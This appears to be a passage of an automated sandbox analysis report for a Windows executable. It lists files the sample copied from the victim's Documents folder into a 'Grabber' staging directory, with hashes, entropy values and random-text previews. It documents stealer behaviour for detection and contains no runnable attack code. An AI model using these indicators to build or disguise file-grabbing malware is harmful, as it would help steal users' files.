Preview:	QVTVNIBKSDCTAQBGAOXCDNDJJSYXWJGWLNQZGTIRDPOXBJKWLQKQGHTGEEYZCSQXRIHLQYWVXDHEUMWEKWFGJLMYICQYBHNEZJWDJOGRRNRTOYBVHVOADCWLJBCJDEJQGWHIISDSHGZRWITARTFGZLYVQWZDXCBALJESXBFEMTGTIZQWIKXFTDQGTAMDONWUIJUYOKJXLUTMOCIHGFKUVWTZWGGDCWXLKJNCFYDCGKWQMLFWZQSHHWIEETWTGXVBHMSPQQUETSKWPAJFMRFRCHDNYKBAAHPLMJRBBAJTVLLAUUCLJYJMJLBKQGNTWGMPYQTUPYRFGMYPSFAZKFDAZPZSDSLLFCSCKJNYWUFBZSQQHSKWDGIBILREFDZJQVIODCTVEDOBTVFRFOHJOUFGKJWSBYWFYBYTUGQGTLYPZCUIXPOJLCNPDOVBXWCGCWSAJJFYOSWSVKPATDKQJRADERJVQVTQESFPSXRVBVEDLVTQYWXVFAKVPURCBYBIAPAQUFQNNEYDRUYBOOCMWAVFRHNFPGDIUCRWCXKMXPIRSBECJROTFLGGLOLFKFRGHTSAIKSQPSZXJDXWBHZHVBFILAACTJHJEQBYDONPYTGLNXEZPFCIDHTTHGIOFCTFHRHIJGRCZPVJAOXIBAJIEMVNELYPQKBHQECWJYTAPCZMZNVFUTOKDAKOXRQKSDSHHXCNPTOQACAKMZSIGEKSTZYQWWAIYNMYZGDCJITHDWZHQWHGDAHXUUSQNHSEWLINMAVJEJLBWIZQNZHARGRNBGZEQKQKZKRPFIWNXAVGMLKQJEJDYBDRSHJBULSDTLIKLIFONGYGERWNAHSKLLHMDBCSSWVOEIGUACWQMNZYBQMRIYIQZQOYRZUOCZWOMBFRIJMVRKAWJHTMEMGVQYWBBMYZGCFTJKRLDPFOIYFDWQUEGJXKLKIPLVLNTFZCDKJMEKYNPPGPMXAGDHXGEVWCGIHPFBAPAKCGGKURXQFPUIQV

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\QVTVNIBKSD\AFWAAFRXKO.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\QVTVNIBKSD\MNULNCRIYC.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.704010251295094
Encrypted:	false
SSDEEP:	24:/j/sfpWFBIirMexXYVw/K9dKAkzFeHx1x21g4kug4c7xy:/j/vBDZxXYVw/KXjHx/4kuUxy
MD5:	DF05C5F93419C56BFE3A84BDCC929382
SHA1:	36AABBCD46C0F368E18FA602E486816D2578F48E
SHA-256:	F7116531006BD0A5DEE64436C66CE5487C662F72BFBCD235C7407FBF2A3278DE
SHA-512:	EB50E34AA5EE92A7C90AA5BCE11F0693AFAC73C26B04AF9C676E15A24813C52EAF09A4EA3F6490223CABCDB3EB6277E74CB6FF288D3D1871F14B410E950656BA
Malicious:	false
Preview:	MNULNCRIYCLQPFRTTBIRJXLLXDPOIGHIWSMRZAWOWMFPIGBQDOQPBHCVDNAEFVPPKLZOIKPKFYDTDOGMSIUWATNOJJJSNKBWJHKKWMUZDRGJJNWUASOTXKYYIZLCOHDOBJPMAPIXVROTWYIYRPFZWZLECCXJOFYKKMMQGDBCRRZBEIALJQWFBIRGZWKKZNILSZURIFNVYXWPHRMYGXATLINJURPYVWCXYNUAESGKBUAMJTBBSVQQAIZKUVJSGVILJMHXCRFQYYXESEYBSMBQEHOEREHZFHPFENYHMHULCMQJKSSZLDDCMPWESAOKZQCENLMVXZGUVHNVUKXEWENTAXUEHCWCADQIRNYDFQPSQSUSDTQUVKPDYTOYMXIFXIMYDOEFHNJDKHPJDUFNMBXUSNDPQKBSTIVTXYHJYKOGCJMZHQRQQDXTWGEMBAJZIDXHPCGJTNITUFATHMPLPFJLWOPXNLVVCCPOQFCWKUCSSMFUWUXSMBYFBMUPJSINHRBJCPPQTSNUWCSGVBNMGEVXSQAUHMBGCNHVBRKKXPGDWRHAWFZYIGXLNCPKSLAZERFWOQNQAXTGZOWNEPLIJOXTLEMUDNYMQCRGFNMOCSUXSKKUKSNFLMUYAVMFWVWOEHAYJWOLYNYYTGSCYSYAJVUNEZQYLOBOCROMKWXPJGQVMSTNKYJEQCUQCBVMAJBOALKJAPYUEVMIWWFMSPLPSKKZMKNEKPQGDNBVBYHNPDIQEEKXUZLGWXQGDQZEHBMYYFUDFGNLYGARBRCREXIQUUWFEXDYINDKFJACYETJBANLSCEYWEBIPFZEOGUWOHBPBFLDAELAEPFOIZRSYWISCBUYPUAHWUVAIRDXHGXUQNAEDFFRDSODQFGQLGCIHSIWHVUDCTSMIQTMXSFNUPKSLBDPGVPMZPHIEMSXUQSRIGGMHVDMGMPEPCJPZBENUEBMZNZVWTRCVAGRSYRBZLOAETCXTWCINHSWQQFCHATVQRGJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\QVTVNIBKSD\PSAMNLJHZW.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	PSA archive data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698960923923406
Encrypted:	false
SSDEEP:	24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
MD5:	186B4E00711974F7AF578BD6FF959BBF
SHA1:	642B794D73FB09655FBFF8EDCAAA267634554569
SHA-256:	2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
SHA-512:	DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
Malicious:	false
Preview:	PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPTORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\QVTVNIBKSD\QVTVNIBKSD.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695938097013837
Encrypted:	false
SSDEEP:	24:z3kwMX3+NBj4ilMczAMBVgs3WrV8bfMbETQzpns7vh2HCpPQ:bkww3UGiJyGWr3RMvh2HC9Q
MD5:	DC3E834A02B2C81DF0167ACE639BA00F
SHA1:	32859A24EE65CBB3BD804D02639FCC4745C1CBC9
SHA-256:	0034D483C5EB801444D442E100E6B97859FB3752243C3323578F94083F469A29
SHA-512:	CA0BEDA568B13F4522ABFCBD8E73CD96AEEF991C8896E5C9F03D999722498840CFF29265340F8D86267E8E134085300FF8D42EC5E4741229332DEAD4B30E6D0F
Malicious:	false
Preview:	QVTVNIBKSDCTAQBGAOXCDNDJJSYXWJGWLNQZGTIRDPOXBJKWLQKQGHTGEEYZCSQXRIHLQYWVXDHEUMWEKWFGJLMYICQYBHNEZJWDJOGRRNRTOYBVHVOADCWLJBCJDEJQGWHIISDSHGZRWITARTFGZLYVQWZDXCBALJESXBFEMTGTIZQWIKXFTDQGTAMDONWUIJUYOKJXLUTMOCIHGFKUVWTZWGGDCWXLKJNCFYDCGKWQMLFWZQSHHWIEETWTGXVBHMSPQQUETSKWPAJFMRFRCHDNYKBAAHPLMJRBBAJTVLLAUUCLJYJMJLBKQGNTWGMPYQTUPYRFGMYPSFAZKFDAZPZSDSLLFCSCKJNYWUFBZSQQHSKWDGIBILREFDZJQVIODCTVEDOBTVFRFOHJOUFGKJWSBYWFYBYTUGQGTLYPZCUIXPOJLCNPDOVBXWCGCWSAJJFYOSWSVKPATDKQJRADERJVQVTQESFPSXRVBVEDLVTQYWXVFAKVPURCBYBIAPAQUFQNNEYDRUYBOOCMWAVFRHNFPGDIUCRWCXKMXPIRSBECJROTFLGGLOLFKFRGHTSAIKSQPSZXJDXWBHZHVBFILAACTJHJEQBYDONPYTGLNXEZPFCIDHTTHGIOFCTFHRHIJGRCZPVJAOXIBAJIEMVNELYPQKBHQECWJYTAPCZMZNVFUTOKDAKOXRQKSDSHHXCNPTOQACAKMZSIGEKSTZYQWWAIYNMYZGDCJITHDWZHQWHGDAHXUUSQNHSEWLINMAVJEJLBWIZQNZHARGRNBGZEQKQKZKRPFIWNXAVGMLKQJEJDYBDRSHJBULSDTLIKLIFONGYGERWNAHSKLLHMDBCSSWVOEIGUACWQMNZYBQMRIYIQZQOYRZUOCZWOMBFRIJMVRKAWJHTMEMGVQYWBBMYZGCFTJKRLDPFOIYFDWQUEGJXKLKIPLVLNTFZCDKJMEKYNPPGPMXAGDHXGEVWCGIHPFBAPAKCGGKURXQFPUIQV

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\QVTVNIBKSD\TQDGENUHWP.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696312162983912
Encrypted:	false
SSDEEP:	24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
MD5:	83B91EFB8185C5AF5A6B60F4FE9CC2D2
SHA1:	0EB7AE1817790DFC5225A02B74A272C84FEE4240
SHA-256:	8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
SHA-512:	F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
Malicious:	false
Preview:	TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\TQDGENUHWP.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696312162983912
Encrypted:	false
SSDEEP:	24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
MD5:	83B91EFB8185C5AF5A6B60F4FE9CC2D2
SHA1:	0EB7AE1817790DFC5225A02B74A272C84FEE4240
SHA-256:	8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
SHA-512:	F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
Malicious:	false
Preview:	TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\TQDGENUHWP.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696312162983912
Encrypted:	false
SSDEEP:	24:G1O/dOdJXH3hrdB2Swsk4go3oInr8X513aQRmy8:Gk/8ASwsk4+p13aQRmy8
MD5:	83B91EFB8185C5AF5A6B60F4FE9CC2D2
SHA1:	0EB7AE1817790DFC5225A02B74A272C84FEE4240
SHA-256:	8CA340B024C5A3134DE6C89C30C866FF4BCE5175C9E1A2F52075C0199BA1AE1E
SHA-512:	F8445B5F18C9F48EFB98B6A310CD757314DA5173FD3490357672B51FED3FF72FF5095E0D17C829D96DE873FC70358D25B7D6369D3458E3AD9BF8D81A5158E46A
Malicious:	false
Preview:	TQDGENUHWPOCQZOYQQOVXFSKSTVMXJXDOGOCIXCWWCXZFXOXQRGWSWDAFLWSMHLOUKOWNWJZPGDUHFUOAFKMGKZSPLKHWSRWYDTUFQOCIDPUEJWNIBXMGMKONCTOFFHYQKJVCNHZNUJEOZENPYTNSRLJTSURGKKJCGXUYFVMRAZPMGMDFRPRULQNWCKIPLLNINZSUGVTDCGZRWHZSXIUPCOMERQUITTFVYNMJAILLEFBCIQKNYWQSMDKSPSFLHLQBLKQAEZLJWWEWETIASOLCSWFIXBUJNPPEHQBZSFNEUZFVYKPQARONAVPSWNEPHPCPVTKNOEKMSHCSJAPMMZNDUPXNUGZKLFLOSEJTWSTMGTHPBJYPYNXJEWKYXAKPNBGAIGQOTOBFIGYXOMEBYKJUBUPHBKYEZJVKWOADWXTWXLHTSSJJEERVQTAWAOSLBHXXTKQCBLUENVULQPPPVUVFHCENGXCXUSAZURTDXJOJRVDUZPYWRIUSKDWALNPHAPYXYAERIQLWZTHISZCPAZAYJUBWJKBPUIGQPXVFOKOOGOSRASRQRXJZKSCRTHITTCLDLPTEZZSZSDTBFLVSLNNNCFBQWXQTNNRLQJVYZMPDHMVNLLNOLJVTFFUHUBHWDTBQKSTZEJFYHQBZJSAPJXIHOPGXRYNJUZKHMXOGNCKLDPKDLFZKFWOTJGQBXZEFMAORUVHQXYVLBLBKUEYUWVIBYNGTPNSHZOAVYSECDNRJFEGATTFBNLTQQUDTNINSTLBVFBUSUTOHOOYLKJQMLOIFMKXGXCKWFSCHWJWRKMACAXTEHDSMYMGSWIIEYXHNGOVDUHWQGNNBGIFZMCRKAOJVZMMWSNYYKMFTRQPINRLBTNCHSQPNQPZMLLJEOZIIMQPOJUGCVEYNAAXXWRXITWSOITACOECPNTBINMRHSPKJBVHYDZYLQUMSXHKEBERJIZQEQTSXEYVHBIPMZLMZSQIREGSQGAJPZFYHOBSSQYU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\TQDGENUHWP\DTBZGIOOSO.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\TQDGENUHWP\KZWFNRXYKI.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\TQDGENUHWP\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
